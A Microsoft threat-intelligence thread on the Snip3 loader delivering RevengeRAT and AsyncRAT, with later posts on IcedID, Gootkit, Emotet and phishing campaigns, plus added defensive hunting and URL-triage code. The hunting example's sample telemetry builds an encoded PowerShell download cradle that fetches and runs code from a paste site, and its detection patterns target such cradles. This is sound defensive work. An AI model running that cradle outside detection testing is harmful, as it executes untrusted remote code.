In the past few months, Microsoft has been tracking a dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT.
Attackers use the remote access Trojans for data theft, follow-on activity, and additional payloads, including Agent Tesla, which they use for data exfiltration. The loader is under active development and is dubbed Snip3 by Morphisec. blog.morphisec.com/revealing-the-…
The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads.
The RATs connect to a C2 server hosted on a dynamic hosting site to register with the attackers, and then use UTF-8-encoded PowerShell and fileless techniques to download three additional stages from pastebin[.]com or similar sites.
The Trojans continuously re-run components until they are able to inject into processes like RegAsm, InstallUtil, or RevSvcs. They steal credentials, screenshots and webcam data, browser and clipboard data, and system and network info, and exfiltrate data, often via SMTP port 587.
Microsoft 365 Defender detects the multiple components of this attack. Our researchers are closely monitoring the campaign and will share additional info and investigation guidance through Microsoft 365 security center and Microsoft Threat Experts.
If your org is in the targeted sectors, we recommend validating that you're not affected. We published advanced hunting queries that you can use to locate relevant or similar activities, emails, implants, and other indicators of attack in your environment: aka.ms/Snip3LoaderCam…
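The thread points at Microsoft's published advanced hunting queries but does not reproduce them. The block below is an added example, not Microsoft's queries or Morphisec's analysis: it turns the behaviours the thread lists (a script host launching PowerShell with a download cradle that references a paste site, RegAsm/InstallUtil/RevSvcs being spawned by a script host, and those same processes talking to a dynamic DNS host or to SMTP port 587) into simple checks over a stream of constructed process-creation and network-connection events. The event layout, the dynamic DNS suffixes, and all hostnames and paths are assumptions made for the example; PowerShell's `-EncodedCommand` argument is base64 of UTF-16LE text, which is what the decoder handles.

```python
"""Hunting heuristics for the Snip3 / RevengeRAT / AsyncRAT chain.

Added example (not Microsoft's hunting queries). All events below are
constructed sample data; nothing here is taken from a real incident.
"""
import base64
import re
from dataclasses import dataclass

PASTE_HOSTS = ("pastebin.com",)                                      # named in the thread
DYNAMIC_DNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".ddns.net")   # assumed examples
INJECTION_TARGETS = {"regasm.exe", "installutil.exe", "revsvcs.exe"}  # named in the thread
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe"}
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|net\.webclient|invoke-webrequest", re.I)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Event:
    kind: str            # "process" (creation) or "network" (outbound connection)
    image: str           # executing binary, e.g. "powershell.exe"
    parent: str = ""     # parent image for process events
    cmdline: str = ""    # full command line for process events
    dest_host: str = ""  # destination host for network events
    dest_port: int = 0   # destination port for network events


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_process(ev):
    findings = []
    image, parent = ev.image.lower(), ev.parent.lower()
    if image == "powershell.exe":
        # Inspect both the raw command line and any decoded payload.
        text = ev.cmdline
        decoded = decode_encoded_command(ev.cmdline)
        if decoded:
            text += " " + decoded
        paste = next((h for h in PASTE_HOSTS if h in text.lower()), None)
        if CRADLE_RE.search(text) and paste:
            findings.append(f"powershell download cradle referencing {paste}")
        elif CRADLE_RE.search(text) and decoded:
            findings.append("encoded powershell download cradle")
    if image in INJECTION_TARGETS and parent in SCRIPT_HOSTS:
        findings.append(f"{image} spawned by {parent} (injection target)")
    return findings


def check_network(ev):
    findings = []
    image, host = ev.image.lower(), ev.dest_host.lower()
    if image not in INJECTION_TARGETS:
        return findings
    if ev.dest_port == 587:
        findings.append(f"{image} outbound SMTP submission to {host}:587 (possible exfiltration)")
    if host.endswith(DYNAMIC_DNS_SUFFIXES):
        findings.append(f"{image} connecting to dynamic DNS host {host} (possible C2 registration)")
    return findings


def hunt(events):
    """Run every heuristic over the event stream and return the findings in order."""
    out = []
    for ev in events:
        out.extend(check_process(ev) if ev.kind == "process" else check_network(ev))
    return out


# Constructed sample telemetry: a VBScript dropper launching encoded PowerShell,
# which stages RegAsm, which then beacons and sends mail. Hosts are placeholders.
STAGE_TWO = 'IEX (New-Object Net.WebClient).DownloadString("https://pastebin.com/raw/EXAMPLE")'
ENCODED = base64.b64encode(STAGE_TWO.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    Event("process", "explorer.exe"),
    Event("process", "wscript.exe", parent="explorer.exe",
          cmdline='wscript.exe "C:\\Users\\victim\\Downloads\\invoice.vbs"'),
    Event("process", "powershell.exe", parent="wscript.exe",
          cmdline=f"powershell.exe -w hidden -enc {ENCODED}"),
    Event("process", "RegAsm.exe", parent="powershell.exe"),
    Event("network", "RegAsm.exe", dest_host="victim-c2.duckdns.org", dest_port=443),
    Event("network", "RegAsm.exe", dest_host="smtp.mail.example", dest_port=587),
    Event("network", "chrome.exe", dest_host="pastebin.com", dest_port=443),  # benign browsing
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The browser visit to pastebin.com is deliberately left unflagged: the signal is the combination of a download cradle in a script host, not the paste site on its own, and the same applies to the network rules, which fire only for the injection targets the thread names.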
More from @MsftSecIntel

13 Apr
The recent surge of IcedID campaigns indicates that this malware family is likely being used to fill in some of the void left by recent malware infrastructure disruptions. We are tracking multiple active IcedID campaigns of various sizes, delivery methods, and targets.
As we recently published, an IcedID campaign abuses contact forms to deliver malicious links via legitimate emails. The malicious links point to IcedID, which downloads a Cobalt Strike implant that allows attackers to perform hands-on-keyboard activities: microsoft.com/security/blog/…
Another campaign delivers IcedID via malicious Excel 4.0 (XLM) macros in spreadsheets within ZIP files attached to COVID-19 and other health-themed emails. AMSI drives behavior-based detection of malicious XLM macros: microsoft.com/security/blog/…
22 Mar
Phishers continue to find success in using compromised accounts on email marketing services to send malicious emails from legitimate IP ranges and domains. They take advantage of configuration settings that ensure delivery of emails even when the email solution detects phishing.
This is the case for the Compact phishing operation, which was disclosed by WMC Global. The campaign was observed using compromised accounts on SendGrid in late 2020. wmcglobal.com/blog/the-compa…
Microsoft Defender for Office 365 data shows that this phishing operation is still active today and continues to expand. In addition to SendGrid, the attackers also used Amazon SES last year. Since January, they have been using Mailgun. We have shared our research with Mailgun.
2 Mar
We're seeing numerous extensive hands-on-keyboard attacks emanating from the Gootkit malware, which is distributed via drive-by downloads as a JavaScript within a ZIP file. The JavaScript is launched via WScript and establishes C2, enabling attackers to take control of devices.
The attacks use blog posts with malicious links pointing to the Gootkit malware. Attackers publish these blog posts on legitimate websites they have compromised. Users are directed to the malicious blog hosts via search engine optimization.
The blogs usually have subjects relating to contracts, canceling services, agreements, and tenancy. These attacks have been observed to primarily target devices in Germany, though multiple other geolocations are targeted as well.
24 Feb
We’re tracking a rampant phishing attack that uses DGA domains, free email services, and even compromised email accounts to send massive numbers of phishing emails. These emails are linked by open redirector URLs that begin with a distinct pattern: hxxps://t[.]domain[.]tld/r/?
The phishing emails pose as notifications from various productivity tools. The use of open redirect is both a detection evasion technique and a way to trick users into clicking the redirector URLs, which show a legitimate domain followed by a redirect to the phishing link.
Microsoft Defender for Office 365 detects this campaign. We’re sharing this info for the broader community & for customers to review mail flow rules, e.g. those related to IP ranges or domain-level allow lists, to ensure phishing emails don’t slip through docs.microsoft.com/en-us/exchange…
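As an added example that is not part of the thread: a small triage routine that refangs the defanged notation used above, finds every URL in an email body, keeps those matching the `https://t.<domain>.<tld>/r/?` redirector shape, and pulls out the destination the redirector forwards to so a reviewer can see whether it leaves the sender's domain. The query parameter name, the mailer domain and the email body are constructed assumptions; the thread does not say how the redirect target is carried.

```python
"""Open-redirector URL triage for the t.<domain>.<tld>/r/? pattern.

Added example; the email text and domains are constructed for illustration.
"""
import re
from urllib.parse import parse_qs, unquote, urlparse

URL_RE = re.compile(r"h(?:xx|tt)ps?://[^\s<>\"']+", re.I)


def refang(text):
    """Turn the hxxps:// and [.] notation back into a parseable URL."""
    return text.replace("hxxp", "http").replace("[.]", ".")


def matches_redirector_pattern(url):
    """True for https://t.<domain>.<tld>/r/?<query> as described in the thread."""
    p = urlparse(url)
    host = p.netloc.lower()
    return (p.scheme.lower() == "https"
            and host.startswith("t.") and host.count(".") >= 2
            and p.path.rstrip("/") == "/r"
            and bool(p.query))


def extract_redirect_target(url):
    """Return the first query value that is itself an http(s) URL, or None.

    The parameter name is unknown, so every value is tried (assumption).
    """
    for values in parse_qs(urlparse(url).query).values():
        for v in values:
            cand = unquote(v)
            if cand.lower().startswith(("http://", "https://")):
                return cand
    return None


def find_redirector_urls(email_text):
    """List each redirector URL found with its target and whether it leaves the mailer's domain."""
    hits = []
    for url in URL_RE.findall(refang(email_text)):
        if not matches_redirector_pattern(url):
            continue
        target = extract_redirect_target(url)
        mailer_domain = urlparse(url).netloc.lower()[len("t."):]
        target_host = urlparse(target).netloc.lower() if target else ""
        hits.append({
            "url": url,
            "target": target,
            "off_domain": bool(target_host) and not target_host.endswith(mailer_domain),
        })
    return hits


# Constructed sample body: a fake voicemail notification with one redirector link,
# one plain link on the mailer's domain and one t.-host link that is not a redirector.
SAMPLE_EMAIL = """You have 3 unread voice messages.
Listen now: hxxps://t[.]example-mailer[.]com/r/?u=https%3A%2F%2Flogin-portal.example.net%2Fauth
Unsubscribe: https://example-mailer.com/unsubscribe?id=123
See also https://t.example-mailer.com/about/
"""

if __name__ == "__main__":
    for hit in find_redirector_urls(SAMPLE_EMAIL):
        print(hit)
```

A hit whose `off_domain` flag is set is the case the thread describes: the visible link carries a legitimate-looking domain while the browser is forwarded elsewhere, which is exactly what a domain-level allow list in a mail flow rule would wave through.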
8 Feb
Microsoft 365 Defender data shows that the disruption of Emotet infrastructure immediately resulted in the drop in new campaigns. Given Emotet’s reach and role in the deployment of payloads like ransomware, however, customers should ensure continued monitoring and protection.
Just before the takedown, Emotet was very active, launching massive campaigns every week after coming out of a hiatus in late December. The most recent campaigns used the usual document attachments with malicious macros that ran a PowerShell script to download a DLL payload.
The use of a DLL payload (instead of an EXE) is one of the updates Emotet introduced in December. These updates, which also included the use of 7 download URLs (up from 5) and a binary format for C2 communication (replacing text), show Emotet was actively evolving before being disrupted.
2 Feb
We detected a recent spike in business email compromise (BEC) attacks soliciting gift cards primarily targeting K-12 schoolteachers. Attackers impersonate colleagues or school officials to ask recipients to purchase various gift cards.
The fraudulent emails are sent from attacker-created accounts on free email service providers, such as Gmail, Mail[.]ru, Yahoo, Hotmail, Outlook, and iCloud. As in many BEC campaigns, attackers identify targets through their publicly available info on websites and social media.
Attackers use various scenarios and lures to feign legitimacy and urgency. Based on intelligence, these attackers have also used COVID-19 lures for similar gift card BEC campaigns.